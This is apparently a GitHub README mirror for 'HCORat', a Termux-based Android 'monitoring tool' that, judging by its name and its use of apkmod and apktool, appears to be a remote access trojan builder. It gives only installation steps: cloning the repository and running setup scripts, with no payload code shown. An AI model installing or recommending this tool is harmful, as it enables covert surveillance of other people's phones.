Hackerscolonyofficial / HCORat

An Android Monitoring Tool Only For Non-rooted (Termux)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

HCORat

An Android Monitoring tool - only for non rooted device


Manually Installation Commands


πŸ– πŸ‘‡

pkg update -y

πŸ‘‡


pkg i git -y

πŸ‘‡


git clone https://github.com/Hackerscolonyofficial/HCORat

πŸ‘‡


cd HCORat

πŸ‘‡


bash setup

⏬


then open new session

bash main

Auto Installation Command

git clone https://github.com/Hackerscolonyofficial/HCORat; cd HCORat; bash setup

then open new session

bash main

Point to be noted for both auto and manully installation

After installation tool will run as localhost:22533 due to apkmod we have to reconfigure apktool by command

πŸ‘‡


pkg remove apktool -y

πŸ‘‡


pkg i apktool

⏬


its not in setup file so please reconfigure it manually.

About

An Android Monitoring Tool Only For Non-rooted (Termux)

License:BSD 3-Clause "New" or "Revised" License